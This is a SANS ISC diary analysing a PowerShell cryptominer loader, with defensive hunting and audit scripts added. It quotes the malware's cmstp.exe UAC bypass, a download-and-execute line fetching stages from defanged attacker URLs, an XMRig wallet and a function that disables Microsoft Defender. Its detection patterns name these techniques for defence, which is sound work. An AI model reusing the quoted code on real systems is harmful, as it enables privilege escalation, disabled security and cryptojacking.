SANS ISC: InfoSec Handlers Diary Blog

Bypassing UAC to Install a Cryptominer

Published: 2019-12-26
Last Updated: 2019-12-26 07:53:16 UTC
by Xavier Mertens (Version: 1)

First of all, Merry Christmas to all our readers! I hope you're enjoying the break with your family and friends! Even if everything slows down in this period, there is always malicious activity ongoing. I found a small PowerShell script that looked interesting for a quick diary. First of all, it has a VT score of 2/60[1]. It installs a cryptominer and its most interesting feature is the use of a classic technique to bypass UAC[2].

To achieve this, it uses the cmstp.exe tool and a DLL. This binary is used by the Microsoft Connection Manager Profile Installer to deploy .inf files. It is located in C:\Windows\System32\ or C:\Windows\SysWOW64\, both of which are listed as trusted directories by AppLocker.

First, the script kills any running cmstp.exe processes:

cmd.exe /C taskkill /IM cmstp.exe /f;

Then, it implements a function to bypass UAC by loading a malicious DLL:

function Bypass-UAC
{
    Param([Parameter(Mandatory = $true, Position = 0)][string]$Command)
    # Only load the assembly once: skip if the CMSTPBypass type already exists
    if(-not ([System.Management.Automation.PSTypeName]"CMSTPBypass").Type)
    {
        # The DLL is embedded as a base64 string, concatenated in chunks
        $a = $a + "<base64_data>";
        $a = $a + "<base64_data>";
        ...
        $a = $a + "<base64_data>";
        # Decode and load the DLL in memory, without touching the disk
        [Reflection.Assembly]::Load([Convert]::FromBase64String("$a")) | Out-Null
    }
    [CMSTPBypass]::Execute($Command)
}

This technique is not new and has been borrowed by the developers from another source[3]. The loaded DLL is well-known on VT and has a decent score: 26/66[4].
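On the detection side, the cmstp.exe abuse described above leaves a distinctive process tree: a script host launching cmstp.exe, cmstp.exe spawning a child, or a taskkill aimed at cmstp.exe just before. The following is an added example, not code from the diary or from the malware, that hunts Sysmon process-creation events for those three patterns. It assumes Sysmon is installed and writing to its default channel; the function name and reason labels are this example's own.

```powershell
# Added example, not code from the diary: hunt process-creation telemetry for
# the cmstp.exe pattern the loader uses. Assumes Sysmon is installed and writing
# to its default channel; channel name and event ID 1 are Sysmon's own.
function Find-CmstpAbuse {
    param(
        [datetime]$StartTime = (Get-Date).AddDays(-7)
    )

    # Script hosts that have no legitimate reason to launch cmstp.exe
    $scriptHosts = @('powershell.exe', 'pwsh.exe', 'cmd.exe',
                     'wscript.exe', 'cscript.exe', 'mshta.exe')

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1               # Sysmon event 1: process creation
        StartTime = $StartTime
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Sysmon stores its fields as <Data Name="...">; flatten them to a hashtable
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        $image      = [string]$d['Image']
        $parent     = [string]$d['ParentImage']
        $cmdLine    = [string]$d['CommandLine']
        $parentLeaf = if ($parent) { (Split-Path $parent -Leaf).ToLower() } else { '' }
        $reason     = $null

        if ($image -match '\\cmstp\.exe$' -and $scriptHosts -contains $parentLeaf) {
            $reason = 'cmstp.exe launched by a script host'
        }
        elseif ($parent -match '\\cmstp\.exe$') {
            # cmstp.exe installs a profile and exits; a child process is unexpected
            $reason = 'cmstp.exe spawned a child process'
        }
        elseif ($cmdLine -match 'taskkill.*cmstp\.exe') {
            # The loader clears any running cmstp.exe before abusing it
            $reason = 'taskkill targeting cmstp.exe'
        }

        if ($reason) {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                Reason      = $reason
                Image       = $image
                Parent      = $parent
                CommandLine = $cmdLine
                User        = $d['User']
            }
        }
    }
}

Find-CmstpAbuse | Format-Table -AutoSize -Wrap
```

Without Sysmon, Security event 4688 carries the same fields (NewProcessName, ParentProcessName, and CommandLine once "Include command line in process creation events" is enabled), so the three conditions port directly. Because cmstp.exe sits in a directory AppLocker trusts by default, the path rule alone will not stop it; where Connection Manager profiles are not used, an explicit deny rule for cmstp.exe for standard users removes the bypass entirely.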

This function is used to grab and launch extra PowerShell scripts:

IEX (New-Object Net.WebClient).DownloadString('hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner')

Multiple URLs are visited and extra code downloaded:

hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner
 > hxxps://hastebin[.]com/raw/odazicisiq
   > hxxp://trsurl[.]com/sa/Miner
     > hxxps://hastebin[.]com/raw/sidodoquse
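Every stage of this chain runs through PowerShell, so Script Block Logging (event 4104) records the decoded code as it executes: the Bypass-UAC function, the base64 assembly load, the IEX/DownloadString calls and the hosts above. The following is an added example, not code from the diary, that searches those logs for the traits shown in the script. It assumes Script Block Logging is enabled; the indicator labels and regexes are this example's own.

```powershell
# Added example, not from the diary: search PowerShell script block logs for the
# loader traits shown above. Assumes Script Block Logging is enabled; event 4104
# is the standard ID for logged script blocks.
function Find-LoaderScriptBlocks {
    param(
        [datetime]$StartTime = (Get-Date).AddDays(-7)
    )

    # Label => regex. Labels are this example's own names, not product signatures.
    $indicators = [ordered]@{
        'uac-bypass-function' = 'Bypass-UAC|CMSTPBypass'
        'in-memory-assembly'  = '\[Reflection\.Assembly\]::Load\(\s*\[Convert\]::FromBase64String'
        'download-and-invoke' = 'IEX\s*\(\s*New-Object\s+Net\.WebClient\)\.DownloadString'
        'known-download-host' = 'trsurl\.com|hastebin\.com/raw'
        'defender-tampering'  = 'Set-MpPreference\s+-Disable\w+\s+\$true|Add-MpPreference\s+-Exclusion'
        'cmstp-taskkill'      = 'taskkill\s+/IM\s+cmstp\.exe'
    }

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $StartTime
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # For 4104, property index 2 is ScriptBlockText and index 3 the ScriptBlockId
        $text = [string]$e.Properties[2].Value
        $hits = foreach ($k in $indicators.Keys) {
            if ($text -match $indicators[$k]) { $k }
        }
        if ($hits) {
            [pscustomobject]@{
                Time          = $e.TimeCreated
                ScriptBlockId = $e.Properties[3].Value
                Indicators    = ($hits -join ', ')
                Preview       = ($text.Substring(0, [Math]::Min(120, $text.Length)) -replace '\s+', ' ')
            }
        }
    }
}

Find-LoaderScriptBlocks | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
```

Script Block Logging is turned on through the "Turn on PowerShell Script Block Logging" policy, or the registry value EnableScriptBlockLogging = 1 under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging; PowerShell 5 and later also logs blocks it considers suspicious at Warning level even without the policy. One caveat: long script blocks are split over several 4104 events (the MessageNumber/MessageTotal properties), so a pattern that straddles a boundary will be missed unless the pieces are joined by ScriptBlockId first.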

The miner is a simple XMRIG with user ID: 42PkwcWLCjheUAaXy2h6CndY9DoKvv4pQ6QogCxgnFFF268ueYNb2FXiLCgQeds64jAytuaXzFTctbsujZYzUuaRVhn8Cjd. Besides the classic function to "seek & hunt" unwanted processes (AV and other competing miners), there is an interesting function used to disable Microsoft Defender:

function disable_defender{
    Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
    Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
    Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
    Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
    Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
    Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
    Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
    Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
    Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
    Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore;
    Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win32.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win64.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionProcess "xmrig.exe" -ErrorAction Ignore;
    Add-MpPreference -ExclusionExtension ".exe" -ErrorAction Ignore;
}
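Each of those Set-MpPreference and Add-MpPreference calls is readable back through Get-MpPreference, so a host can be audited for exactly this set of changes. The following is an added example, not code from the diary or from the malware, that reports every switch disable_defender flips, the "Allow" default actions, exclusions on user-writable paths or whole extensions, and whether Tamper Protection is on. It uses only Defender's own cmdlets; the function name and finding texts are this example's own, and it should be run elevated.

```powershell
# Added example, not from the diary: audit the local Defender configuration for
# the changes disable_defender makes. Uses only Defender's own Get-MpPreference and
# Get-MpComputerStatus cmdlets; the finding labels are this example's own.
function Test-DefenderTampering {
    $p = Get-MpPreference
    $findings = New-Object System.Collections.Generic.List[string]

    # Protection switches the script sets to $true
    $disableSwitches = 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring',
                       'DisableBlockAtFirstSeen', 'DisableIOAVProtection',
                       'DisableArchiveScanning', 'DisableIntrusionPreventionSystem',
                       'DisableScriptScanning', 'DisablePrivacyMode'
    foreach ($name in $disableSwitches) {
        if ($p.$name) { $findings.Add("$name is True") }
    }

    # Cloud protection and sample submission turned off
    if ($p.MAPSReporting -eq 0)        { $findings.Add('MAPSReporting is 0 (cloud protection disabled)') }
    if ($p.SubmitSamplesConsent -eq 2) { $findings.Add('SubmitSamplesConsent is 2 (never send)') }

    # Default action 6 means Allow: a detection is logged but nothing is removed
    foreach ($level in 'Low', 'Moderate', 'High', 'Severe') {
        $prop = "${level}ThreatDefaultAction"
        if ($p.$prop -eq 6) { $findings.Add("$prop is 6 (Allow)") }
    }

    # Exclusions: user-writable staging directories, executable extensions, named processes
    foreach ($path in @($p.ExclusionPath | Where-Object { $_ })) {
        if ($path -match '^C:\\(ProgramData|Users\\Public)') {
            $findings.Add("ExclusionPath covers a user-writable location: $path")
        }
    }
    foreach ($ext in @($p.ExclusionExtension | Where-Object { $_ })) {
        if ($ext -match '^\.?(exe|dll|ps1|bat|vbs|js)$') {
            $findings.Add("ExclusionExtension excludes executable content: $ext")
        }
    }
    foreach ($proc in @($p.ExclusionProcess | Where-Object { $_ })) {
        $findings.Add("ExclusionProcess present: $proc")
    }

    # Tamper Protection blocks the Set-MpPreference calls that turn off real-time,
    # behavior, IOAV and cloud protection
    $status = Get-MpComputerStatus
    if (-not $status.IsTamperProtected) {
        $findings.Add('Tamper Protection is off')
    }

    [pscustomobject]@{
        Computer = $env:COMPUTERNAME
        Tampered = ($findings.Count -gt 0)
        Findings = $findings
    }
}

Test-DefenderTampering | Format-List
```

To establish when the change happened, the Microsoft-Windows-Windows Defender/Operational log records event 5001 when real-time protection is disabled and 5007 for each configuration change, which lines up with the Set-MpPreference calls one by one. Restoring the baseline is the inverse of the script (Set-MpPreference with $false, Remove-MpPreference for each exclusion), and with Tamper Protection enabled the real-time, behavior, IOAV and cloud switches cannot be flipped this way in the first place.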

[1] https://www.virustotal.com/gui/file/c5ec59f873fe31025703855a2406845199d2da221738d3c76daa3b9996c6cd14/detection
[2] https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works
[3] https://www.who-ami.net/how-to-bypass-uac-in-newer-windows-versions/
[4] https://www.virustotal.com/gui/file/da9fc045098c3502920dee3fe65660de0049792307605f89b08361e28ce74dad/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
